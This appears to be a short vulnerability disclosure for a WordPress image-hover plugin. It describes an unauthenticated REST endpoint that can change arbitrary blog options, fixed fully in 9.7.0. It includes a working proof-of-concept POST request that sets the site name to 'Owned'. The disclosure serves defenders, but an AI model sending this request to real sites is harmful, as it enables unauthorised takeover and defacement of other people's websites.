The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options. The original report mentioned the issue being fixed in 9.6.2, however it was still possible for attackers to exploit it and proper remediation has been done in 9.7.0
POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Connection: close
rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22Owned%22%7D